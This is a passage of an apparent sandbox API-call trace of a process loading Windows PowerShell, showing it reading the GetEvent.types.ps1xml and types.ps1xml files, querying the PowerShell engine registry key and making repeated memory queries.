	[0148.159] ReadFile (in: hFile=0x350, lpBuffer=0x2afb494, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e454, lpOverlapped=0x0 | out: lpBuffer=0x2afb494*, lpNumberOfBytesRead=0x14e454*=0x0, lpOverlapped=0x0) returned 1
	[0148.159] GetLastError () returned 0x0
	[0148.159] CloseHandle (hObject=0x350) returned 1
	[0148.160] GetLastError () returned 0x0
	[0148.161] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x14dfb4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0148.161] GetLastError () returned 0x0
	[0148.161] SetErrorMode (uMode=0x1) returned 0x1
	[0148.161] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2b0c808 | out: lpFileInformation=0x2b0c808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0058e2, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0058e2, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd7bbaefc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0148.162] GetLastError () returned 0x0
	[0148.162] SetErrorMode (uMode=0x1) returned 0x1
	[0148.468] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x14df80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0148.468] GetLastError () returned 0x0
	[0148.468] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e3d8 | out: phkResult=0x14e3d8*=0x350) returned 0x0
	[0148.469] RegQueryValueExW (in: hKey=0x350, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e420, lpData=0x0, lpcbData=0x14e41c*=0x0 | out: lpType=0x14e420*=0x1, lpData=0x0, lpcbData=0x14e41c*=0x56) returned 0x0
	[0148.469] RegQueryValueExW (in: hKey=0x350, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e420, lpData=0x721bd8, lpcbData=0x14e41c*=0x56 | out: lpType=0x14e420*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x14e41c*=0x56) returned 0x0
	[0148.470] RegCloseKey (hKey=0x350) returned 0x0
	[0148.470] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x14df80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0148.470] GetLastError () returned 0x0
	[0148.470] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x14df14, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0148.470] GetLastError () returned 0x0
	[0151.241] GetSystemInfo (in: lpSystemInfo=0x14db58 | out: lpSystemInfo=0x14db58*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0151.242] VirtualQuery (in: lpAddress=0x14d314, lpBuffer=0x14e314, dwLength=0x1c | out: lpBuffer=0x14e314*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0151.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x14deec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0151.962] GetLastError () returned 0x0
	[0151.963] SetErrorMode (uMode=0x1) returned 0x1
	[0151.963] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x350
	[0151.963] GetLastError () returned 0x0
	[0151.963] GetFileType (hFile=0x350) returned 0x1
	[0151.963] SetErrorMode (uMode=0x1) returned 0x1
	[0151.963] GetFileType (hFile=0x350) returned 0x1
	[0151.963] ReadFile (in: hFile=0x350, lpBuffer=0x2b40c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e454, lpOverlapped=0x0 | out: lpBuffer=0x2b40c24*, lpNumberOfBytesRead=0x14e454*=0x1000, lpOverlapped=0x0) returned 1
	[0151.963] GetLastError () returned 0x0
	[0151.964] ReadFile (in: hFile=0x350, lpBuffer=0x2b40c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e454, lpOverlapped=0x0 | out: lpBuffer=0x2b40c24*, lpNumberOfBytesRead=0x14e454*=0x1000, lpOverlapped=0x0) returned 1
	[0151.964] GetLastError () returned 0x0
	[0151.964] ReadFile (in: hFile=0x350, lpBuffer=0x2b40c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e454, lpOverlapped=0x0 | out: lpBuffer=0x2b40c24*, lpNumberOfBytesRead=0x14e454*=0x1000, lpOverlapped=0x0) returned 1
	[0151.964] GetLastError () returned 0x0
	[0151.965] ReadFile (in: hFile=0x350, lpBuffer=0x2b40c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e454, lpOverlapped=0x0 | out: lpBuffer=0x2b40c24*, lpNumberOfBytesRead=0x14e454*=0x1000, lpOverlapped=0x0) returned 1
	[0151.965] GetLastError () returned 0x0
	[0151.965] ReadFile (in: hFile=0x350, lpBuffer=0x2b40c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e454, lpOverlapped=0x0 | out: lpBuffer=0x2b40c24*, lpNumberOfBytesRead=0x14e454*=0x1000, lpOverlapped=0x0) returned 1
	[0151.965] GetLastError () returned 0x0
	[0151.966] ReadFile (in: hFile=0x350, lpBuffer=0x2b40c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e454, lpOverlapped=0x0 | out: lpBuffer=0x2b40c24*, lpNumberOfBytesRead=0x14e454*=0x1000, lpOverlapped=0x0) returned 1
	[0151.966] GetLastError () returned 0x0
	[0151.966] ReadFile (in: hFile=0x350, lpBuffer=0x2b40c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e454, lpOverlapped=0x0 | out: lpBuffer=0x2b40c24*, lpNumberOfBytesRead=0x14e454*=0x1000, lpOverlapped=0x0) returned 1
	[0151.966] GetLastError () returned 0x0
	[0151.966] ReadFile (in: hFile=0x350, lpBuffer=0x2b40c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e454, lpOverlapped=0x0 | out: lpBuffer=0x2b40c24*, lpNumberOfBytesRead=0x14e454*=0x1000, lpOverlapped=0x0) returned 1
	[0151.966] GetLastError () returned 0x0
	[0151.966] ReadFile (in: hFile=0x350, lpBuffer=0x2b40c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e454, lpOverlapped=0x0 | out: lpBuffer=0x2b40c24*, lpNumberOfBytesRead=0x14e454*=0x1000, lpOverlapped=0x0) returned 1
	[0151.966] GetLastError () returned 0x0
	[0151.968] ReadFile (in: hFile=0x350, lpBuffer=0x2b40c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e454, lpOverlapped=0x0 | out: lpBuffer=0x2b40c24*, lpNumberOfBytesRead=0x14e454*=0x1000, lpOverlapped=0x0) returned 1
	[0151.968] GetLastError () returned 0x0
	[0151.968] ReadFile (in: hFile=0x350, lpBuffer=0x2b40c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e454, lpOverlapped=0x0 | out: lpBuffer=0x2b40c24*, lpNumberOfBytesRead=0x14e454*=0x1000, lpOverlapped=0x0) returned 1
	[0151.968] GetLastError () returned 0x0
	[0151.968] ReadFile (in: hFile=0x350, lpBuffer=0x2b40c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e454, lpOverlapped=0x0 | out: lpBuffer=0x2b40c24*, lpNumberOfBytesRead=0x14e454*=0x1000, lpOverlapped=0x0) returned 1
	[0151.968] GetLastError () returned 0x0
	[0151.968] ReadFile (in: hFile=0x350, lpBuffer=0x2b40c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e454, lpOverlapped=0x0 | out: lpBuffer=0x2b40c24*, lpNumberOfBytesRead=0x14e454*=0x1000, lpOverlapped=0x0) returned 1
	[0151.968] GetLastError () returned 0x0
	[0151.969] ReadFile (in: hFile=0x350, lpBuffer=0x2b40c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e454, lpOverlapped=0x0 | out: lpBuffer=0x2b40c24*, lpNumberOfBytesRead=0x14e454*=0x1000, lpOverlapped=0x0) returned 1
	[0151.969] GetLastError () returned 0x0
	[0151.969] ReadFile (in: hFile=0x350, lpBuffer=0x2b40c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e454, lpOverlapped=0x0 | out: lpBuffer=0x2b40c24*, lpNumberOfBytesRead=0x14e454*=0x1000, lpOverlapped=0x0) returned 1
	[0151.969] GetLastError () returned 0x0
	[0151.969] ReadFile (in: hFile=0x350, lpBuffer=0x2b40c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e454, lpOverlapped=0x0 | out: lpBuffer=0x2b40c24*, lpNumberOfBytesRead=0x14e454*=0x1000, lpOverlapped=0x0) returned 1
	[0151.969] GetLastError () returned 0x0
	[0151.969] ReadFile (in: hFile=0x350, lpBuffer=0x2b40c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e454, lpOverlapped=0x0 | out: lpBuffer=0x2b40c24*, lpNumberOfBytesRead=0x14e454*=0x1000, lpOverlapped=0x0) returned 1
	[0151.969] GetLastError () returned 0x0
	[0151.972] ReadFile (in: hFile=0x350, lpBuffer=0x2b40c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e454, lpOverlapped=0x0 | out: lpBuffer=0x2b40c24*, lpNumberOfBytesRead=0x14e454*=0x1000, lpOverlapped=0x0) returned 1
	[0151.972] GetLastError () returned 0x0
	[0151.972] ReadFile (in: hFile=0x350, lpBuffer=0x2b40c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e454, lpOverlapped=0x0 | out: lpBuffer=0x2b40c24*, lpNumberOfBytesRead=0x14e454*=0x1000, lpOverlapped=0x0) returned 1
	[0151.972] GetLastError () returned 0x0
	[0151.972] ReadFile (in: hFile=0x350, lpBuffer=0x2b40c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e454, lpOverlapped=0x0 | out: lpBuffer=0x2b40c24*, lpNumberOfBytesRead=0x14e454*=0x1000, lpOverlapped=0x0) returned 1
	[0151.972] GetLastError () returned 0x0
	[0151.972] ReadFile (in: hFile=0x350, lpBuffer=0x2b40c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e454, lpOverlapped=0x0 | out: lpBuffer=0x2b40c24*, lpNumberOfBytesRead=0x14e454*=0x1000, lpOverlapped=0x0) returned 1
	[0151.972] GetLastError () returned 0x0
	[0151.973] ReadFile (in: hFile=0x350, lpBuffer=0x2b40c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e454, lpOverlapped=0x0 | out: lpBuffer=0x2b40c24*, lpNumberOfBytesRead=0x14e454*=0x1000, lpOverlapped=0x0) returned 1
	[0151.973] GetLastError () returned 0x0
	[0151.973] ReadFile (in: hFile=0x350, lpBuffer=0x2b40c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e454, lpOverlapped=0x0 | out: lpBuffer=0x2b40c24*, lpNumberOfBytesRead=0x14e454*=0x1000, lpOverlapped=0x0) returned 1
	[0151.973] GetLastError () returned 0x0
	[0151.973] ReadFile (in: hFile=0x350, lpBuffer=0x2b40c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e454, lpOverlapped=0x0 | out: lpBuffer=0x2b40c24*, lpNumberOfBytesRead=0x14e454*=0x1000, lpOverlapped=0x0) returned 1
	[0151.973] GetLastError () returned 0x0
	[0151.973] ReadFile (in: hFile=0x350, lpBuffer=0x2b40c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e454, lpOverlapped=0x0 | out: lpBuffer=0x2b40c24*, lpNumberOfBytesRead=0x14e454*=0x1000, lpOverlapped=0x0) returned 1
	[0151.973] GetLastError () returned 0x0
	[0151.973] ReadFile (in: hFile=0x350, lpBuffer=0x2b40c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e454, lpOverlapped=0x0 | out: lpBuffer=0x2b40c24*, lpNumberOfBytesRead=0x14e454*=0x1000, lpOverlapped=0x0) returned 1
	[0151.974] GetLastError () returned 0x0
	[0151.974] ReadFile (in: hFile=0x350, lpBuffer=0x2b40c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e454, lpOverlapped=0x0 | out: lpBuffer=0x2b40c24*, lpNumberOfBytesRead=0x14e454*=0x1000, lpOverlapped=0x0) returned 1
	[0151.977] GetLastError () returned 0x0
	[0151.977] ReadFile (in: hFile=0x350, lpBuffer=0x2b40c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e454, lpOverlapped=0x0 | out: lpBuffer=0x2b40c24*, lpNumberOfBytesRead=0x14e454*=0x1000, lpOverlapped=0x0) returned 1
	[0151.977] GetLastError () returned 0x0
	[0151.977] ReadFile (in: hFile=0x350, lpBuffer=0x2b40c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e454, lpOverlapped=0x0 | out: lpBuffer=0x2b40c24*, lpNumberOfBytesRead=0x14e454*=0x1000, lpOverlapped=0x0) returned 1
	[0151.977] GetLastError () returned 0x0
	[0151.977] ReadFile (in: hFile=0x350, lpBuffer=0x2b40c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e454, lpOverlapped=0x0 | out: lpBuffer=0x2b40c24*, lpNumberOfBytesRead=0x14e454*=0x1000, lpOverlapped=0x0) returned 1
	[0151.977] GetLastError () returned 0x0
	[0151.978] ReadFile (in: hFile=0x350, lpBuffer=0x2b40c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e454, lpOverlapped=0x0 | out: lpBuffer=0x2b40c24*, lpNumberOfBytesRead=0x14e454*=0x1000, lpOverlapped=0x0) returned 1
	[0151.978] GetLastError () returned 0x0
	[0151.978] ReadFile (in: hFile=0x350, lpBuffer=0x2b40c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e454, lpOverlapped=0x0 | out: lpBuffer=0x2b40c24*, lpNumberOfBytesRead=0x14e454*=0x1000, lpOverlapped=0x0) returned 1
	[0151.978] GetLastError () returned 0x0
	[0151.978] ReadFile (in: hFile=0x350, lpBuffer=0x2b40c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e454, lpOverlapped=0x0 | out: lpBuffer=0x2b40c24*, lpNumberOfBytesRead=0x14e454*=0x1000, lpOverlapped=0x0) returned 1
	[0151.978] GetLastError () returned 0x0
	[0151.984] ReadFile (in: hFile=0x350, lpBuffer=0x2b40c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e454, lpOverlapped=0x0 | out: lpBuffer=0x2b40c24*, lpNumberOfBytesRead=0x14e454*=0x1000, lpOverlapped=0x0) returned 1
	[0151.984] GetLastError () returned 0x0
	[0151.985] ReadFile (in: hFile=0x350, lpBuffer=0x2b40c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e454, lpOverlapped=0x0 | out: lpBuffer=0x2b40c24*, lpNumberOfBytesRead=0x14e454*=0x1000, lpOverlapped=0x0) returned 1
	[0151.985] GetLastError () returned 0x0
	[0151.985] ReadFile (in: hFile=0x350, lpBuffer=0x2b40c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e454, lpOverlapped=0x0 | out: lpBuffer=0x2b40c24*, lpNumberOfBytesRead=0x14e454*=0x1000, lpOverlapped=0x0) returned 1
	[0151.985] GetLastError () returned 0x0
	[0151.985] ReadFile (in: hFile=0x350, lpBuffer=0x2b40c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e454, lpOverlapped=0x0 | out: lpBuffer=0x2b40c24*, lpNumberOfBytesRead=0x14e454*=0x1000, lpOverlapped=0x0) returned 1
	[0151.985] GetLastError () returned 0x0
	[0151.985] ReadFile (in: hFile=0x350, lpBuffer=0x2b40c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e454, lpOverlapped=0x0 | out: lpBuffer=0x2b40c24*, lpNumberOfBytesRead=0x14e454*=0x1000, lpOverlapped=0x0) returned 1
	[0151.985] GetLastError () returned 0x0
	[0151.986] ReadFile (in: hFile=0x350, lpBuffer=0x2b40c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e454, lpOverlapped=0x0 | out: lpBuffer=0x2b40c24*, lpNumberOfBytesRead=0x14e454*=0x1000, lpOverlapped=0x0) returned 1
	[0151.986] GetLastError () returned 0x0
	[0151.986] ReadFile (in: hFile=0x350, lpBuffer=0x2b40c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e454, lpOverlapped=0x0 | out: lpBuffer=0x2b40c24*, lpNumberOfBytesRead=0x14e454*=0x1000, lpOverlapped=0x0) returned 1
	[0151.986] GetLastError () returned 0x0
	[0151.986] ReadFile (in: hFile=0x350, lpBuffer=0x2b40c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e454, lpOverlapped=0x0 | out: lpBuffer=0x2b40c24*, lpNumberOfBytesRead=0x14e454*=0x1000, lpOverlapped=0x0) returned 1
	[0151.986] GetLastError () returned 0x0
	[0151.987] ReadFile (in: hFile=0x350, lpBuffer=0x2b40c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e454, lpOverlapped=0x0 | out: lpBuffer=0x2b40c24*, lpNumberOfBytesRead=0x14e454*=0x1b4, lpOverlapped=0x0) returned 1
	[0151.987] GetLastError () returned 0x0
	[0151.987] ReadFile (in: hFile=0x350, lpBuffer=0x2b40c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e454, lpOverlapped=0x0 | out: lpBuffer=0x2b40c24*, lpNumberOfBytesRead=0x14e454*=0x0, lpOverlapped=0x0) returned 1
	[0151.987] GetLastError () returned 0x0
	[0151.987] CloseHandle (hObject=0x350) returned 1
	[0151.987] GetLastError () returned 0x0
	[0151.987] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x14dfb4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0151.987] GetLastError () returned 0x0
	[0151.987] SetErrorMode (uMode=0x1) returned 0x1
	[0151.987] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2b614b4 | out: lpFileInformation=0x2b614b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7c2d31c, ftCreationTime.dwHighDateTime=0x1c9ea11, ftLastAccessTime.dwLowDateTime=0xd7c2d31c, ftLastAccessTime.dwHighDateTime=0x1c9ea11, ftLastWriteTime.dwLowDateTime=0xd7c5347c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0151.987] GetLastError () returned 0x0
	[0151.988] SetErrorMode (uMode=0x1) returned 0x1
	[0151.988] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x14df80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0151.988] GetLastError () returned 0x0
	[0151.988] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e3d8 | out: phkResult=0x14e3d8*=0x350) returned 0x0
	[0151.988] RegQueryValueExW (in: hKey=0x350, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e420, lpData=0x0, lpcbData=0x14e41c*=0x0 | out: lpType=0x14e420*=0x1, lpData=0x0, lpcbData=0x14e41c*=0x56) returned 0x0
	[0151.988] RegQueryValueExW (in: hKey=0x350, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e420, lpData=0x721bd8, lpcbData=0x14e41c*=0x56 | out: lpType=0x14e420*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x14e41c*=0x56) returned 0x0
	[0151.988] RegCloseKey (hKey=0x350) returned 0x0
	[0151.988] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x14df80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0151.988] GetLastError () returned 0x0
	[0151.989] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x14df14, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0151.989] GetLastError () returned 0x0
	[0156.274] VirtualQuery (in: lpAddress=0x14d314, lpBuffer=0x14e314, dwLength=0x1c | out: lpBuffer=0x14e314*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.402] VirtualQuery (in: lpAddress=0x14d314, lpBuffer=0x14e314, dwLength=0x1c | out: lpBuffer=0x14e314*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.404] VirtualQuery (in: lpAddress=0x14d314, lpBuffer=0x14e314, dwLength=0x1c | out: lpBuffer=0x14e314*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.404] VirtualQuery (in: lpAddress=0x14d314, lpBuffer=0x14e314, dwLength=0x1c | out: lpBuffer=0x14e314*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.404] VirtualQuery (in: lpAddress=0x14d314, lpBuffer=0x14e314, dwLength=0x1c | out: lpBuffer=0x14e314*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.405] VirtualQuery (in: lpAddress=0x14d314, lpBuffer=0x14e314, dwLength=0x1c | out: lpBuffer=0x14e314*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.406] VirtualQuery (in: lpAddress=0x14d314, lpBuffer=0x14e314, dwLength=0x1c | out: lpBuffer=0x14e314*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.409] VirtualQuery (in: lpAddress=0x14d314, lpBuffer=0x14e314, dwLength=0x1c | out: lpBuffer=0x14e314*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.425] VirtualQuery (in: lpAddress=0x14d314, lpBuffer=0x14e314, dwLength=0x1c | out: lpBuffer=0x14e314*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.425] VirtualQuery (in: lpAddress=0x14d314, lpBuffer=0x14e314, dwLength=0x1c | out: lpBuffer=0x14e314*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.426] VirtualQuery (in: lpAddress=0x14d314, lpBuffer=0x14e314, dwLength=0x1c | out: lpBuffer=0x14e314*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.426] VirtualQuery (in: lpAddress=0x14d314, lpBuffer=0x14e314, dwLength=0x1c | out: lpBuffer=0x14e314*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.426] VirtualQuery (in: lpAddress=0x14d314, lpBuffer=0x14e314, dwLength=0x1c | out: lpBuffer=0x14e314*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.426] VirtualQuery (in: lpAddress=0x14d314, lpBuffer=0x14e314, dwLength=0x1c | out: lpBuffer=0x14e314*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.427] VirtualQuery (in: lpAddress=0x14d314, lpBuffer=0x14e314, dwLength=0x1c | out: lpBuffer=0x14e314*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.427] VirtualQuery (in: lpAddress=0x14d314, lpBuffer=0x14e314, dwLength=0x1c | out: lpBuffer=0x14e314*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.437] VirtualQuery (in: lpAddress=0x14d314, lpBuffer=0x14e314, dwLength=0x1c | out: lpBuffer=0x14e314*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.575] VirtualQuery (in: lpAddress=0x14d314, lpBuffer=0x14e314, dwLength=0x1c | out: lpBuffer=0x14e314*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.575] VirtualQuery (in: lpAddress=0x14d314, lpBuffer=0x14e314, dwLength=0x1c | out: lpBuffer=0x14e314*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.576] VirtualQuery (in: lpAddress=0x14d314, lpBuffer=0x14e314, dwLength=0x1c | out: lpBuffer=0x14e314*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.577] VirtualQuery (in: lpAddress=0x14d314, lpBuffer=0x14e314, dwLength=0x1c | out: lpBuffer=0x14e314*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
